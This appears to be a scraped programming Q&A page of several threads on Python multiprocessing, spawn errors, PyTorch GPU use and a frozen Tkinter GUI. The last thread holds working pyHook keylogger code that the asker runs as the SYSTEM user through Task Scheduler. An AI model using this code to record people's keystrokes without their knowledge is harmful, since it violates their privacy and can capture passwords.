`ProcessPoolExecutor` works on Ubuntu, but fails with `BrokenProcessPool` when running Jupyter 5.0.0 notebook with Python 3.5.3 on Windows 10 - windows

I'm running Jupyter 5.0.0 notebook with Python 3.5.3 on Windows 10. The following example code fails to run:
from concurrent.futures import as_completed, ProcessPoolExecutor
import time
import numpy as np
def do_work(idx1, idx2):
time.sleep(0.2)
return np.mean([idx1, idx2])
with ProcessPoolExecutor(max_workers=4) as executor:
futures = set()
for idx in range(32):
future = winprocess.submit(
executor, do_work, idx, idx * 2
)
futures.add(future)
for future in as_completed(futures):
print(future.result())
... and throws BrokenProcessPool: A process in the process pool was terminated abruptly while the future was running or pending.
The code works perfectly fine on Ubuntu 14.04.
I've understand that Windows doesn't have os.fork, thus multiprocessing is handled differently, and doesn't always play nice with interactive mode and Jupyter.
What are some workarounds to make ProcessPoolExecutor work in this case?
There are some similar questions, but they relate to multiprocessing.Pool:
multiprocessing.Pool in jupyter notebook works on linux but not windows

Closer inspection shows that a Jupyter notebook can run external python modules which is parallelized using ProcessPoolExecutor. So, a solution is to do the parallelizable part of your code in a module and call it from the Jupyter notebook.
That said, this can be generalized as a utility. The following can be stored as a module, say, winprocess.py and imported by jupyter.
import inspect
import types
def execute_source(callback_imports, callback_name, callback_source, args):
for callback_import in callback_imports:
exec(callback_import, globals())
exec('import time' + "\n" + callback_source)
callback = locals()[callback_name]
return callback(*args)
def submit(executor, callback, *args):
callback_source = inspect.getsource(callback)
callback_imports = list(imports(callback.__globals__))
callback_name = callback.__name__
future = executor.submit(
execute_source,
callback_imports, callback_name, callback_source, args
)
return future
def imports(callback_globals):
for name, val in list(callback_globals.items()):
if isinstance(val, types.ModuleType) and val.__name__ != 'builtins' and val.__name__ != __name__:
import_line = 'import ' + val.__name__
if val.__name__ != name:
import_line += ' as ' + name
yield import_line
Here is how you would use this:
from concurrent.futures import as_completed, ProcessPoolExecutor
import time
import numpy as np
import winprocess
def do_work(idx1, idx2):
time.sleep(0.2)
return np.mean([idx1, idx2])
with ProcessPoolExecutor(max_workers=4) as executor:
futures = set()
for idx in range(32):
future = winprocess.submit(
executor, do_work, idx, idx * 2
)
futures.add(future)
for future in as_completed(futures):
print(future.result())
Notice that executor has been changed with winprocess and the original executor is passed to the submit function as a parameter.
What happens here is that the notebook function code and imports are serialized and passed to the module for execution. The code is not executed until it is safely in a new process, thus does not trip up with trying to make a new process based on the jupyter notebook itself.
Imports are handled in such a way as to maintain aliases. The import magic can be removed if you make sure to import everything needed for the function being executed inside the function itself.
Also, this solution only works if you pass all necessary variables as arguments to the function. The function should be static so to speak, but I think that's a requirement of ProcessPoolExecutor as well. Finally, make sure you don't execute other functions defined elsewhere in the notebook. Only external modules will be imported, thus other notebook functions won't be included.

Related

Why does huggingface hang on list input for pipeline sentiment-analysis?

With python 3.10 and latest version of huggingface.
for simple code likes this
from transformers import pipeline
input_list = ['How do I test my connection? (Windows)', 'how do I change my payment method?', 'How do I contact customer support?']
classifier = pipeline('sentiment-analysis')
results = classifier(input_list)
the program hangs and returns error messages:
File ".......env/lib/python3.10/multiprocessing/spawn.py", line 134, in _check_not_importing_main
raise RuntimeError('''
RuntimeError:
An attempt has been made to start a new process before the
current process has finished its bootstrapping phase.
This probably means that you are not using fork to start your
child processes and you have forgotten to use the proper idiom
in the main module:
if __name__ == '__main__':
freeze_support()
...
but replace the list input with a string, it works
from transformers import pipeline
classifier = pipeline('sentiment-analysis')
result = classifier('How do I test my connection? (Windows)')
It needs to define a main function to run multitask that the list input depends on. Following update works
from transformers import pipeline
def main():
input_list = ['How do I test my connection? (Windows)',
'how do I change my payment method?',
'How do I contact customer support?']
classifier = pipeline('sentiment-analysis')
results = classifier(input_list)
if __name__ == '__main__':
main()
The question is reduced to where to put freeze_support() in a Python script?

Multiprocessing runtime error freeze_support() in Mac 64 bit

I am trying to learn Threading and Multiprocessing on a MacOS. I am unable to launch the processes though, with python giving the following error message.
Error
RuntimeError:
An attempt has been made to start a new process before the
current process has finished its bootstrapping phase.
This probably means that you are not using fork to start your
child processes and you have forgotten to use the proper idiom
in the main module:
if __name__ == '__main__':
freeze_support()
...
The "freeze_support()" line can be omitted if the program
is not going to be frozen to produce an executable.
my code:
parallel_processing.py
import multiprocessing
import time
start= time.perf_counter()
def do_something():
print('sleeping 1 sec....')
time.sleep(1)
return('done sleeping...')
# do_something()
p1 = multiprocessing.Process(target = do_something)
p2 = multiprocessing.Process(target = do_something)
p1.start()
p2.start()
finish= time.perf_counter()
print(f'finished in {finish-start} seconds')
It seems that you can resolve the issue by putting your code inside the block if __name__ == '__main__'. For example:
import multiprocessing as mp
import time
def do_something():
...
if __name__ == '__main__':
p1 = mp.Process(target=do_something)
p2 = mp.Process(target=do_something)
p1.start()
p2.start()
...
I'm not sure this is resulted from the recent macOS update or python, but it seems to have to do with how OS creates new threads, i.e. forking versus spwaning. Please see this blog post for details.

How to run perticular code in gpu using PyTorch?

I am using an image processing code in python opencv. Since that process is taking a lot of time to process say 30 images. I tried to process these image parallel using Multiprocessing. The multiprocessing part is working good in CPU but I want to use that multiprocessing thing in GPU(cuda).
I use torch.multiprocessing for running task in parallel. So I am using torch.device('cuda') for our class to run whole thing in to this perticular device. When I run the code it's showing device using "cuda" but not using any GPU processing.
import cv2
import numpy as np
import torch
import torch.nn as nn
from torch.multiprocessing import Process, Pool, Manager, set_start_method
import sys
import os
class RoadShoulderWidth(nn.Module):
def __init__(self):
super(RoadShoulderWidth, self).__init__()
pass
// Want to run below method in parallel for 30 images.
#staticmethod
def get_dim(image, road_shoulder_width_list):
..... code
def get_road_shoulder_width(self, _root_dir, _img_path_list):
manager = Manager()
road_shoulder_width_list = manager.list()
processes = []
for img_path in img_path_list[:30]:
img = cv2.imread(_root_dir + '/' + img_path)
img = img[72 * 5:72 * 6, 0:1280]
# Do work
p = Process(target=self.get_dim,args=(img,road_shoulder_width_list))
p.start()
processes.append(p)
for p in processes:
p.join()
return road_shoulder_width_list
Use below set of code to run your class
if __name__ == '__main__':
root_dir = '/home/nikhil_m/r'
img_path_list = os.listdir(root_dir)
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
print('Using device:', device)
dataloader_kwargs = {'pin_memory': True}
set_start_method('fork')
obj = RoadShoulderWidth().to(device)
val = obj.get_road_shoulder_width(str(root_dir), img_path_list)
print(val)
print(torch.cuda.is_available())
Can anybody suggest me how to fix this?
Your class RoadShoulderWidth is a nn.Module subclass which lets you use .to(device). This only means that all other nn.Module objects or nn.Parameters that are members of your RoadShoulderWidth object are moved to the device. As from your example, there are none, so nothing happens.
In general PyTorch does not move code to GPU but data. If all data of a pytorch operation are on the GPU (e.g. a + b, a and b are on GPU) then the operation is executed on the GPU. You can move the data with a.to(device), given a is a torch.Tensor object.
PyTorch can only execute its own operations on GPU. It's not able to execute OpenCV code on GPU.

Tkinter problems with GUI when entering while loop

I have a simple GUI which run various scripts from another python file, everything works fine until the GUI is running a function which includes a while loop, at which point the GUI seems to crash and become in-active. Does anybody have any ideas as to how this can be overcome, as I believe this is something to do with the GUI being updated,Thanks. Below is a simplified version of my GUI.
GUI
#!/usr/bin/env python
# Python 3
from tkinter import *
from tkinter import ttk
from Entry import ConstrainedEntry
import tkinter.messagebox
import functions
AlarmCode = "2222"
root = Tk()
root.title("Simple Interface")
mainframe = ttk.Frame(root, padding="3 3 12 12")
mainframe.grid(column=0, row=0, sticky=(N, W, E, S))
mainframe.columnconfigure(0, weight=1)
mainframe.rowconfigure(0, weight=1)
ttk.Button(mainframe, width=12,text="ButtonTest",
command=lambda: functions.test()).grid(
column=5, row=5, sticky=SE)
for child in mainframe.winfo_children():
child.grid_configure(padx=5, pady=5)
root.mainloop()
functions
def test():
period = 0
while True:
if (period) <=100:
time.sleep(1)
period +=1
print(period)
else:
print("100 seconds has passed")
break
What will happen in the above is that when the loop is running the application will crash. If I insert a break in the else statement after the period has elapsed, everything will work fine. I want users to be able to click when in loops as this GUI will run a number of different functions.
Don't use time.sleep in the same thread than your Tkinter code: it freezes the GUI until the execution of test is finished. To avoid this, you should use after widget method:
# GUI
ttk.Button(mainframe, width=12,text="ButtonTest",
command=lambda: functions.test(root))
.grid(column=5, row=5, sticky=SE)
# functions
def test(root, period=0):
if period <= 100:
period += 1
print(period)
root.after(1000, lambda: test(root, period))
else:
print("100 seconds has passed")
Update:
In your comment you also add that your code won't use time.sleep, so your original example may not be the most appropiate. In that case, you can create a new thread to run your intensive code.
Note that I posted the alternative of after first because multithreading should be used only if it is completely necessary - it adds overhead to your applicacion, as well as more difficulties to debug your code.
from threading import Thread
ttk.Button(mainframe, width=12,text="ButtonTest",
command=lambda: Thread(target=functions.test).start())
.grid(column=5, row=5, sticky=SE)
# functions
def test():
for x in range(100):
time.sleep(1) # Simulate intense task (not real code!)
print(x)
print("100 seconds has passed")

pyhook user keyboard

Using Windows 7, Python 2.7 I wrote and compiled the code below (with pyinstaller2-0) and it works fine if I start it by right clicking and choose run as admin, but when I start it through the task scheduler as the system user, it does not log any keys (after the 10 second wait, it just creates an empty output file). I'm thinking maybe because I'm running it as a different account, its not hooking the "correct keyboard"?
import threading
import pyHook
import pythoncom
import time
def OnKeyboardEvent(event):
global keylog
keylog.append(chr(event.Ascii))
return
class thekeylogger ( threading.Thread ):
def run ( self ):
hm = pyHook.HookManager()
hm.KeyDown = OnKeyboardEvent
hm.HookKeyboard()
pythoncom.PumpMessages()
return
keylog = []
thekeylogger().start()
time.sleep(10)
keys = "".join(keylog)
output_file = open('c:\\project\\test.txt', 'w')
output_file.write(keys)
output_file.close()

Resources